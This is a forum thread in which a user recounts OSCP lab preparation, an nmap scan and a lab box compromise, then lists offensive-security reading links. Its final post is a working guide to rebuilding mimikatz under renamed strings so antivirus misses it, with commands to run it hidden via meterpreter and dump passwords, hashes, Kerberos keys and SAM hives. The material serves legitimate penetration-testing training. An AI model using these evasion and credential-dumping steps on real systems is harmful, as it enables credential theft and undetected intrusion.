    So I received my VPN details to test the connection. I tested the connectivity and decided to run a quick nmap scan and to my surprise I was connected to the real lab... and I had 48 hours of play time! I wasn't going to let that go to waste, although if I had to sign up again I probably would have signed up on a Thursday so I had the whole weekend to play. I have a full time job so I only had about 5 hours total in the labs, minus the time it took to set up the connection . So naturally, I decided to give it a go icon_wink.gif My scan revealed many boxes with a fair amount of open ports: This was going to be good! The OffSec people had specified in the email which host ranges to scan, and my IP address was in the 192.168.14.x range. They mentioned I should be able to ping the x.x.x.220 ip address of my range, depending on which of the lab ranges I ended up in (random). The range though, is a /23. I tried pinging 192.168.14.220 and couldn't ping it but when I tried 192.168.15.220 I saw ping replies.

    So out came nmap as per my methodology explained in my earlier post:
    nmap -Pn -F -sSU -T5 -oX /root/192.168.15.200-254.xml 192.168.15.200-254 | grep -v 'filtered|closed' > /root/quick_recon.txt

    This command took about 4 minutes to complete, and the open ports lit up like a Christmas tree. I didn't really have any idea or preference of which host to attack first, and seeing so many open ports on so many machines, I figured the simplest approach would be to start at the lowest IP and work my way up through the IP addresses.

    I started with the first IP address. After enumerating the host, I found a vulnerability I could exploit. I didn't want to use Metasploit for this because I would learn more doing things by hand first. I didn't start up my listener before I fired off my fumbled attempt to exploit and this resulted in a denial of service on the machine: I crashed it by accident and had no way to reset it. I didn't have a GUI panel available to reset hosts since I was only supposed to be testing the VPN connection icon_rolleyes.gif.

    After this silly mistake I decided to change my attack methodology, mainly because I want to maximize my time in the labs and exploit every host: I will use Metasploit for mundane tasks like reverse shells, simple fire-and-forget exploits and uploading files through Meterpreter. After I complete the labs and if I still have time left, I will repeat the exploits by hand.

    I then moved on to the next host which I expect will require some form of brute-forcing. I was looking for something a little more meaty than building a word-list and running a brute force tool against a server so I proceeded to the next IP in the list. My next target was called Bob, and I had a great time breaking into Bob. I went to bed 2 hours later than I had planned to, I just couldn't get myself to go to bed knowing I could solve this puzzle. My persistence paid off, and after about 3 hours of puzzling and taking notes and screenshots, Bob was mine.. and it felt great! I looted the box, left behind the digital equivalent of graffiti (a "Jollyfrogs.txt" file with some words of wisdom) and logged off from the VPN, tired but extremely satisfied.

    Being the first host I exploited to system/root level, it certainly will be a name I will remember. I didn't have time to look at other hosts but Bob made me realize that my generic approach works which is a relief.

    My exam starts Sunday the 21st of June (next week) and I'm excited to start!
  • MrAgentMrAgent Member Posts: 1,310 ■■■■■■■■□□
    Good thread so far. Keep it up!
    How much time did you sign up for?
  • JollyFrogsJollyFrogs Member Posts: 97 ■■■□□□□□□□
    MrAgent wrote: »
    Good thread so far. Keep it up!
    How much time did you sign up for?

    Hi MrAgent, I signed up for 90 days.
  • the_Grinchthe_Grinch Member Posts: 4,165 ■■■■■■■■■■
    Awesome posts! Let me just commend you on all the work you have done prior to signing up. What's your background?
    WIP:
    PHP
    Kotlin
    Intro to Discrete Math
    Programming Languages
    Work stuff
  • JoJoCal19JoJoCal19 Mod Posts: 2,835 Mod
    This thread is great! Thanks for all of the info JollyFrogs. Also like the_Grinch, I'd like to know what your background is. Also if it wouldn't be too much trouble, can you list the sources, links, book names, you used to to learn these pre-sign up skills? It would be beneficial to myself and others looking at the OSCP.
    Have: CISSP, CISM, CISA, CRISC, eJPT, GCIA, GSEC, CCSP, CCSK, AWS CSAA, AWS CCP, OCI Foundations Associate, ITIL-F, MS Cyber Security - USF, BSBA - UF, MSISA - WGU
    Currently Working On: Python, OSCP Prep
    Next Up:​ OSCP
    Studying:​ Code Academy (Python), Bash Scripting, Virtual Hacking Lab Coursework
  • JollyFrogsJollyFrogs Member Posts: 97 ■■■□□□□□□□
    the_Grinch wrote: »
    Awesome posts! Let me just commend you on all the work you have done prior to signing up. What's your background?
    JoJoCal19 wrote: »
    This thread is great! Thanks for all of the info JollyFrogs. Also like the_Grinch, I'd like to know what your background is. Also if it wouldn't be too much trouble, can you list the sources, links, book names, you used to to learn these pre-sign up skills? It would be beneficial to myself and others looking at the OSCP.

    Hi The_Grinch and JoJoCal19, I started using computers when I was 7 when my dad bought a Commodore 64 for the family. Although a family gift, none of my family members were interested in computers so I had plenty of time to get acquainted with BASIC and of course play the many games that I was trading with friends. There was no internet back in the days and most programs would be loaded from music cassettes (magnetic tape is still used today to store information for instance in DLT tapes). I remember tuning in to radio shows that broadcast code which you could record onto cassette and then load in the computer. We're talking WarGames era here where internet connections still made beeping and screeching noises. Of course my parents never allowed me to use the phone line so I was limited to one-way traffic from the public radio stations to my dad's Pioneer radio system.

    The above might make me sound old but I'm only 38 (I guess that statement is relative) and have worked with computers my whole life. When I was 20 I was poached by a large corporation to work on IBM Mainframes. This was in the late 1990's and it was a time of plenty, back then companies would hire anyone to work on computers due to a global shortage of IT staff. I started off in "Tape Setup" department which was a large library of magnetic DLT tapes, and we would be working in shifts 24-hour around the clock, watching 3 screens with "batch job requests", essentially tape ID numbers, and run to the correct tape readers to insert these tapes. I have fond memories of Tape Setup. The Tape Setup also served as a prospective pool of future Mainframe operators, and after a few weeks there was an opening as a Mainframe operator in the systems team. I applied and was hired. I worked with mainframes in shifts for around a year and was poached internally by a visionary manager who had just started the "Windows NT department". Our mainframe computer terminals were being replaced by NT workstations at a very fast pace and their department couldn't keep up. I got a job as an NT server administrator. They gave me an MCSE NT 4.0 course and I certified. Shortly after, I was among the first people in the world to certify for Windows 2000 (The only reason I know this is because I received a signed "early achiever" reward from Bill Gates). My manager allowed me to study almost non-stop as long as I kept the servers running. I was responsible for about 70 Windows NT servers, and they all ran like clockwork, so I had plenty of time to study.

    (Shortening the story a bit here) After a few years in the Windows server department, I realized that my days as a server administrator would soon be coming to an end as more and more of our systems support was being outsourced to India. As Darwin once said, "It is not the strongest species that survives, but the most adaptable". So I got Cisco certifications and applied for a job in networks support, which I did for a few years. When networking started to get off-shored and outsourced, and with the rise of "the cloud" which virtualizes most of the networking equipment I was supporting, I got into security. Security came naturally to me as most of my setups would take it into account, and having a broad basis of systems knowledge and networks really helped ease the learning curve. I got CISSP certified, did some contracting and freelancing and have settled in an information security job in Brisbane for about a year now. I'm enjoying security and believe this will be my last career switch, having switched twice within the IT field.

    Over the years I have gotten quite a few certifications, partly thanks to employers who saw the benefit in training their staff but mostly because I self-study at home almost every day - I enjoy it and I crave it. My list of certifications includes CCNP, CCDP, CCVP, MCSE, MCDBA, CISSP (the list is quite extensive but those would be my preferred ones; the ones I learnt most from or have gotten most value out of during my career). Every 2 years I get another Cisco certification simply to keep my certs active, the Windows certifications don't expire and I need 40 CPE points per year for my CISSP accreditation. Unfortunately the value of these certifications has dropped significantly with the up-rise of brain-dumping sites. And that is why I'm doing OSCP now! It's hands-on. No cheating and no brain-dumping: This is a journey that people take alone. This is the "Camino de la Sabatera" of the IT certifications: I will value this certificate more than any of the ones I have gotten so far (except perhaps my early achievers award from Bill Gates!). I have learnt so much already even before starting the course.

    Overall I would rate my knowledge coming into the OSCP studies as follows:
    Networks = excellent
    Microsoft = excellent
    Linux = moderate
    Coding = moderate
    Scripting = moderate
    Security (theory) = moderate
    Security (practical) = moderate
    Assembly = low
    Python = zero
    Linux Kali = zero
    Metasploit = zero

    I will list the resources I used to get up to speed in a separate reply. I'm on 904 pages of notes so far in KeepNote so I will just get the most important links that I used.

    EDIT: I posted the links, but I guess the sheer volume of URLs resulted in the post being marked for review by a moderator. If it doesn't get approved - which due to the hackish nature of some of the links is completely understandable - then I will post a pastebin link instead.
  • JollyFrogsJollyFrogs Member Posts: 97 ■■■□□□□□□□
    As requested, here is a non-exhaustive list of resources I have used so far. Please keep in mind that some of these links have hundreds or thousands of links in them, most of which I would have read. A good resource to start out is the very first link on this website, which has hundreds of interesting links.

    Be warned: This rabbit hole goes deep.

    Interesting reading:
    https://code.google.com/p/pentest-bookmarks/wiki/BookmarksList
    http://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/
    https://blog.netspi.com/netspis-top-cracked-passwords-for-2014/
    https://github.com/SpiderLabs/Responder
    http://windowssecrets.com/top-story/
    http://resources.infosecinstitute.com/in-depth-seh-exploit-writing-tutorial-using-ollydbg/
    https://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/
    http://jbremer.org/mona-101-a-global-samsung-dll/
    http://sgros-students.blogspot.sg/2014/09/immunity-debugger-basics-part-1.html
    http://sgros-students.blogspot.sg/2014/09/immunity-debugger-basics-part-2.html
    http://blog.cobaltstrike.com/2014/03/20/user-account-control-what-penetration-testers-should-know/
    http://www.pretentiousname.com/misc/win7_uac_whitelist2.html
    http://www.pretentiousname.com/misc/W7E_Source/win7_uac_poc_details.html
    http://withinwindows.com/2009/02/05/list-of-windows-7-beta-build-7000-auto-elevated-binaries/
    https://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/
    http://security.stackexchange.com/questions/54324/should-i-worry-about-this-uac-bypass-exploit-for-windows-7
    http://www.primalsecurity.net/0x8-exploit-tutorial-the-elusive-egghunter/
    http://hackerforhire.com.au/
    http://n01g3l.tumblr.com/
    http://veneetbhardwaj.blogspot.sg/
    http://nethekk.blogspot.sg/2014/01/slmail-exploit.html
    https://github.com/samratashok/nishang
    http://j3rge.blogspot.sg/
    https://twitter.com/ithurricanept
    https://github.com/hfiref0x
    http://www.pretentiousname.com/misc/win7_uac_whitelist2.html
    https://zdresearch.com/internet-explorer-version-detect-rop-genration/
    http://www.justanotherhacker.com/2011/12/writing-a-stealth-web-shell.html
    http://woshub.com/how-to-extract-windows-user-passwords-from-hiberfil-sys/
    http://rycon.hu/papers/goldenticket.html
    http://www.beneaththewaves.net/Projects/Mimikatz_20_-_Golden_Ticket_Walkthrough.html


    Exploit and vulnerability databases:
    http://www.exploit-db.com
    https://code.google.com/p/google-security-research/issues/list?can=1&q=&colspec=ID+Type+Status+Priority+Milestone+Owner+Summary&cells=tiles
    http://packetstormsecurity.com/files/os/7
    https://packetstormsecurity.com/
    http://farlight.org/index.html?type=local


    Restricted shell escape:
    https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/


    Privilege Escalation:
    http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
    https://blog.netspi.com/windows-privilege-escalation-part-1-local-administrator-privileges/
    https://blog.netspi.com/windows-privilege-escalation-part-2-domain-admin-privileges/
    http://www.fuzzysecurity.com/tutorials/16.html
    https://www.youtube.com/watch?v=kMG8IsCohHA
    http://www.greyhathacker.net/?p=738
    http://harmj0y.net
    http://www.tarasco.org/


    ROP: ASLR and DEP/NX:
    https://www.trustwave.com/Resources/SpiderLabs-Blog/Baby-s-first-NX-ASLR-bypass/
    http://security.stackexchange.com/questions/20497/stack-overflows-defeating-canaries-aslr-dep-nx
    http://en.wikipedia.org/wiki/Return-oriented_programming
    http://www.mastropaolo.com/2005/06/04/buffer-overflow-attacks-bypassing-dep-nxxd-bits-part-1/
    https://samsclass.info/127/proj/rop.htm
    http://nicholas.carlini.com/papers/2014_usenix_ropattacks.pdf
    https://ctf-team.vulnhub.com/picoctf-2014-hardcore-rop/


    Boot to root websites:
    https://exploit-exercises.com/
    http://0daysecurity.com/pentest.html
    http://blog.agupieware.com/2014/10/hack-lab-part-3-installing-victim.html


    Pentesting blogs:
    https://idzer0.com


    Reconnaissance websites:
    http://whois.domaintools.com/nextdc.com


    Shell codes:
    https://www.exploit-db.com/shellcode/
    http://www.secdev.org/projects/shellforge/
    https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/
    http://www.leidecker.info/downloads/index.shtml#shells
    https://github.com/dotcppfile/Serbot
    http://shell-storm.org/shellcode/
    http://bernardodamele.blogspot.sg/2011/09/reverse-shells-one-liners.html


    Tools to hide Shells:
    https://www.veil-framework.com/


    EggHunters:
    http://www.primalsecurity.net/0x8-exploit-tutorial-the-elusive-egghunter/


    Exploit Development:
    https://github.com/SaltwaterC/sploit-tools
    https://github.com/r41p41/snippets
    https://zdresearch.com/internet-explorer-version-detect-rop-genration/
    https://github.com/byt3bl33d3r/MITMf
    https://www.qualys.com/research/top10/2014/07/


    Password leaks/lists:
    http://www.leakedin.com
    http://securityxploded.com/passwordsecrets.php


    OSCP reviews:
    http://popped.io


    Hash cracking:
    http://forum.insidepro.com/viewforum.php?f=31&sid=b162ba8467cf30221b72f1dc23055572
    http://www.hashkiller.co.uk
  • justjenjustjen Member Posts: 77 ■■□□□□□□□□
    JollyFrogs, I have been following your adventures in preparing for the OSCP with great interest and enjoyment. Your posts are always a good read, both informational and amusing. I look forward to following your continued adventures, and have been inspired to start my own journey, now in the early getting ready stage. Good luck in this exciting trip! :)
  • veritas_libertasveritas_libertas Member Posts: 5,746 ■■■■■■■■■■
    Great stuff! Keep it coming :) I'm sure you will pass. icon_thumright.gif
  • JollyFrogsJollyFrogs Member Posts: 97 ■■■□□□□□□□
    Bob was a great experience, one thing was bugging me though: When I ran mimikatz "it didn't work". No output, nothing. The command ran then exited without errors. I now know that the desktop must have been full of error dialogs, let's hope Bob wasn't using his computer when I did.

    I had compiled mimikatz from source, and I wondered if that might have broken something. So I fired up a Windows XP SP0 machine and tried the pre-compiled mimikatz version from the inter-webs. Sure thing, the program worked flawlessly. I then ran my compiled version - which I thought should be identical - and when executing mimikatz I got an error screen on the desktop stating a "DecodePointer" function in Kernel32.dll couldn't be found. I did some research on this error and learnt that the DecodePointer function was only added to kernel32.dll after Windows SP2: Mystery solved! I added the DecodePointer function to the solution, built it, fired up mimikatz on my Windows XP SP0 machine it worked.

    A minor inconvenience was that my antivirus would pick up Mimikatz as malware and delete the file. I proceeded to change the mimikatz code very slightly and I've come up with a version that my antivirus doesn't detect (yet) as a virus. I've attached the complete procedure below in case someone wants to compile Mimikatz from source and runs into the same issue:

    Author: JollyFrogs, Brisbane
    NOTE: Disable all virus-scanners before you start downloading, keep them disabled until your files are compiled


    Get the required programs and files:
    Download: https://github.com/gentilkiwi/mimikatz/archive/master.zip (Free)
    Download: GRMWDK_EN_7600_1.ISO from Microsoft (Free)
    Download: vs2013.4_ce_enu.iso from Microsoft (Free)
    Download: fnr.exe from https://findandreplace.codeplex.com/downloads/get/809617
    Download: http://mulder.googlecode.com/svn/trunk/Utils/EncodePointerLib/Release/EncodePointer.lib (you can optionally compile it from source)


    Install Driver Development Toolkit:
    Extract GRMWDK_EN_7600_1.ISO with 7-zip
    Run KitSetup.exe
    - Click Yes to start the installation
    - Tick "Full Development Environment" and leave all other options unticked
    - Click "OK" in the bottom right
    - Install path: C:\WinDDK\7600.16385.1\
    - Click "OK" in the bottom right
    - Tick "I Agree" in the bottom left and click "OK"
    NOTE: The installation commences
    - Click "Finish" in the "Microsoft WDK Install Progress" screen


    Install Visual Studio 2013 Community Edition:
    Extract vs2013.4_ce_enu.iso with 7-zip
    Run vs_community.exe
    - Click "Continue" if you get a setup warning
    - Install path: C:\Program Files (x86)\Microsoft Visual Studio 12.0\
    - Tick "I agree to the License Terms and Privacy Policy."
    - Untick "Join the Visual Studio Experience Improvement Program"
    - Click "Next"
    - Tick and then untick "Select All" to select nothing
    - Click "INSTALL"
    - Click "Yes" to close the UAC warning screen
    NOTE: the installation commences
    - Click "LAUNCH" after install completes
    - Click "Not now, maybe later." in the Welcome screen
    - Select "General" and Select "Blue" and Click "Start Visual Studio"


    Prevent AV detection on Mimikatz:
    Extract mimikatz-master.zip to C:\jollykatz\ (you should end up with C:\jollykatz\mimikatz-master\mimikatz.sln" and a whole bunch of files/folders)


    run the following in a cmd.exe to rename all files and folders to from "mimi" to "jolly":
    powershell.exe -noprofile -command "1..10 | % {Get-ChildItem c:\jollykatz\ -Filter \"*mimi*\" -Recurse | Rename-Item -NewName {$_.name -replace 'mimi','jolly' }}"
    powershell.exe -noprofile -command "1..10 | % {Get-ChildItem c:\jollykatz\ -Filter \"*kuhl*\" -Recurse | Rename-Item -NewName {$_.name -replace 'kuhl','frog' }}"


    run fnr.exe with following settings:
    Dir: C:\jollykatz\
    Tick "Include sub-directories
    File Mask: *.*
    Find: mimi
    replace: jolly
    Click "replace"
    run fnr.exe with following settings:
    Dir: C:\jollykatz\
    Tick "Include sub-directories
    File Mask: *.*
    Find: kuhl
    replace: frog
    Click "replace"
    run fnr.exe with following settings:
    Dir: C:\jollykatz\
    Tick "Include sub-directories
    File Mask: *.*
    Find: eo.oe.kiwi :)
    replace: THINC.local
    Click "replace"
    Close fnr.exe


    Copy "EncodePointer.lib" to C:\jollykatz\jollykatz-master\lib\Win32
    Copy "EncodePointer.lib" to C:\jollykatz\jollykatz-master\lib\x64
    NOTE: We're adding "EncodePointer.lib" because WinXP SP0/SP1 would error out with a DecodePointer error caused by compiling with VS2013


    Now we'll build "Jollykatz":
    - Double-click on "C:\jollykatz\jollykatz-master\jollykatz.sln"
    NOTE: Visual Studio Community Edition opens your project


    - In the "Solution Explorer" window on the right, expand "global files" -> "lib" -> right-click on "Win32" and select "Add" -> "Existing Item"
    - Choose "C:\jollykatz\jollykatz-master\lib\Win32\EncodePointer.lib"
    - In the "Solution Explorer" window on the right, expand "global files" -> "lib" -> right-click on "x64" and select "Add" -> "Existing Item"
    - Choose "C:\jollykatz\jollykatz-master\lib\x64\EncodePointer.lib"


    - In the "Solution Explorer" window on the right, right-click on "jollykatz" (might have to scroll to bottom) and select "Properties"
    - Expand "Configuration Properties" -> "General" -> Set "Use of MFC" to "Use Standard Windows Libraries"
    - Click "Apply" in the bottom
    - Expand "Configuration Properties" -> "C/C++" -> "Code Generation" -> Set "Runtime Library" to "Multi-threaded (/MT)"
    - Click "Apply" in the bottom
    - Expand "Configuration Properties" -> "Linker" -> "Input" -> Add "EncodePointer.lib;" at the start of "Additional Dependencies" (in front of "advapi32.lib")
    - Click "OK" in the bottom


    - In the top menu bar, click "Build" -> "Rebuild Solution"
    NOTE: You should see "Rebuild All: 3 succeeded, 0 failed, 0 up-to-date, 0 skipped"
    NOTE: This means that the 32-bit build succeeded!


    - In the top bar, next to "Release", change "Win32" to "x64"
    - In the top menu bar, click "Build" -> "Rebuild Solution"
    NOTE: You should see "Rebuild All: 3 succeeded, 0 failed, 0 up-to-date, 0 skipped"
    NOTE: This means that the 64-bit build succeeded!


    NOTE: You should now see 5 files in the C:\jollykatz\jollykatz-master\Win32\ directory, of which you will need 3:
    - jollykatz.exe
    - jollylib.dll
    - jollydrv.sys
    NOTE: You should see the same file structure in the C:\jollykatz\jollykatz-master\x64\ directory


    Copy and rename C:\jollykatz\jollykatz-master\Win32\jollykatz.exe to C:\jollykatz\jollykatz32.exe
    Copy and rename C:\jollykatz\jollykatz-master\x64\jollykatz.exe to C:\jollykatz\jollykatz64.exe
    NOTE: Typically, you only need jollykatz.exe, the driver (jollydrv.sys) and library (jollylib.dll) files are optional. If you need the drivers, copy and rename them as well.


    NOTE: Hopefully, your antivirus won't pick up on the new jollykatz.exe files. If it does, you'll need to modify some code. Or use the Veil framework.


    Run Mimikatz from memory through meterpreter (advisable):
    execute -H -i -c -m -d calc.exe -f jollykatz.exe -a '"privilege::debug" "sekurlsa::logonPasswords full" "exit"'


    How to use:


    -- **** clear-text passwords from LSASS process:
    C:\> jollykatz32.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"


    -- Steal users credentials until they reset their passwords:
    C:\> jollykatz32.exe "privilege::debug" "sekurlsa::ekeys" "exit"


    -- **** LM and NTLM hashes from SAM:
    C:\> jollykatz32.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"


    -- read SAM file from /repair or ntbackup files:
    C:\> reg save HKLM\SYSTEM SystemBkup.hiv
    C:\> reg save HKLM\SAM SamBkup.hiv
    (Or use Volume Shadow Copy / BootCD to backup these files or get them from the repair folder:)
    C:\Windows\System32\config\SYSTEM
    C:\Windows\System32\config\SAM
    C:\> jollykatz32.exe "lsadump::sam SystemBkup.hiv SamBkup.hiv" "exit"
Sign In or Register to comment.